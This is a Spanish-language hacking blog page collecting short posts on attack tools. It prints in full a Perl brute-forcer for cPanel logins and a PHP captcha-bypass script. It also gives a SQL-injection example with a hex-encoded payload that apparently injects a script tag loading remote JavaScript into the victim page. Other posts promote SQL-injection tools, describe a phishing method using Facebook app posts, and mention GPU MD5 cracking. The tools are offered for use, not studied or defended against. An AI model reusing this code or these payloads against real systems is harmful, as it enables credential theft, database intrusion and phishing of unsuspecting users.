Seguridad
SQL-PwnZ 1.5 – Herramienta para SQL Injection
13 jul
Algunos deben recordar que anteriormente les había hablado de esta tool. Hoy me encontré en la web de Login-Root que ya esta disponible la version 1.5.
Las novedades son:
[+] Agregado mod_security Bypass.
[+] Agregado Illegal Mix Of Collations Bypass.
[+] Agregadas más tablas para bruteforce.
[+] Agregadas más columnas para bruteforce.
[+] Código interno mejorado.
[+] Bugs Fixeados.
(No Ratings Yet)
Loading ...
Cpanel Password Brute Forcer
13 jul
Aquí les dejo una herramienta, el nombre lo dice todo. Esta hecha en Perl:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);exit;}
headx();
$numstart = "-1";
sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}
(No Ratings Yet) Loading ...Script PHP, salta captcha simple
7 jul
Este script les puede ser útil en algún caso, solo es modificarlo dependiendo del mismo.
<?
$ch = curl_init();
$url = "http:/url/archivo.php";
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID=a0eb811980f1f25e956dd3a501f0cc0b');
$resultado = curl_exec($ch);
$exp = explode(" = ",$resultado);
$exp2 = explode("<br />",$exp[1]);
$captcha = $exp2[0];
echo $captcha."<br>";
$ch2 = curl_init();
$url2 = "http://url/archivo.php?variable=$captcha";
curl_setopt($ch2,CURLOPT_URL,$url2);
curl_setopt($ch2, CURLOPT_COOKIE, 'PHPSESSID=a0eb811980f1f25e956dd3a501f0cc0b');
$resultado2 = curl_exec($ch2);
?>
(No Ratings Yet) Loading ...Realizar Jailbreak a Iphone, Ipad y Ipod Touch
6 may
Desde hace algunos días se encuentra disponible Spirit, una herramienta que permite realizar Jailbreak con un solo click al Iphone, Ipad y Ipod Touch. Cuenta con versiones para Windows y Mac OS y entre las novedades que nos ofrece este programa podemos encontrar que permite realizar Jailbreak a dispositivos con Firmware versión 3.1.3 (Iphone y Ipod Touch) y versión 3.2 (Ipad). Funciona con Itunes 9.1, ya que como algunos sabrán blackra1n anteriormente presentaba problemas con esa versión y solo se podía usar aplicando un parche. Y la característica más importante para mi es que permite hacer un Jailbreak permanente (untethered), es decir que si apagamos el dispositivo no tendremos que conectarlo al PC para volverlo a ‘hackear’.
Pueden encontrar la descarga en su sitio oficial: Spirit.
PD: Si tienen problemas usando este programa, ejecútenlo en modo compatibilidad con Windows 98.
Tutorial de como usar Spirit para realizar el Jailbreak
(No Ratings Yet) Loading ...Haciendo pishing en Facebook
14 abr
En anteriores post como Editar publicaciones de aplicaciones en Facebook había comentado como modificar resultados de publicaciones de aplicaciones. Hoy por curiosidad hice lo mismo pero modificando las imágenes y enlaces, con el resultado de que es posible:
La URL de Abrir una galleta se puede cambiar por lo queramos, si se hiciera una publicación llamativa de seguro muchos usuarios en busca de usar la aplicación harían click. Una forma muy simple de hacer pishing.
Por el momento es todo, cuando avance en algo les estaré informando. Como recomendación siempre que usen una aplicación fíjense en la dirección a la que los envié.
(No Ratings Yet) Loading ...General Injection Explorer 3.0
16 feb
Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.
[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.
[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.
[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–
En el siguiente gif pueden ver como funciona:
(1 votes, average: 5,00 out of 5) Loading ...Delito Informatico
4 dic
Quiero compartir con uds. un texto sobre los delitos informáticos, escrito por mi amigo 00000000 y Dark_jisaw.
Contenido:
Primeras Observaciones
1.1. ¿Qué es un delito?
1.2. ¿Qué es un delito informático?
1.3. Actores de un delito informático
1.4. Penalización en Colombia
1.5. Historia del delito informático
1.6. Cibervandalismo / Ciberterrorismo Más >
(No Ratings Yet) Loading ...Bug en Windows Live Messenger
1 dic
Hace algunos días hablando con unos amigos por Messenger, me di cuenta de un bugsito que tiene no es nada grave pero puede ser algo molesto.
En primer lugar debe ser una conversación en grupo:
(No Ratings Yet) Loading ...SQL-PwnZ 1.1 – Herramienta para SQL Injection
17 nov
Comparto con uds una herramienta muy útil para realizar inyecciones SQL.
Más >
(1 votes, average: 1,00 out of 5) Loading ...Crackear MD5 con GPU ATI
3 nov
Hace algún tiempo en DragonJAR publicaron Distributed Password Recovery, un programa que usa el GPU de tarjetas Nvidia, para descifrar contraseñas. En mi caso no poseo una tarjeta Nvidia, por lo que no puedo usar DPR. Me di a la tarea de buscar una alternativa para ATI y encontre BarsWF que tiene dos versiones, una para tarjetas Nvidia y otra para tarjetas ATI.
(No Ratings Yet) Loading ...
Wargame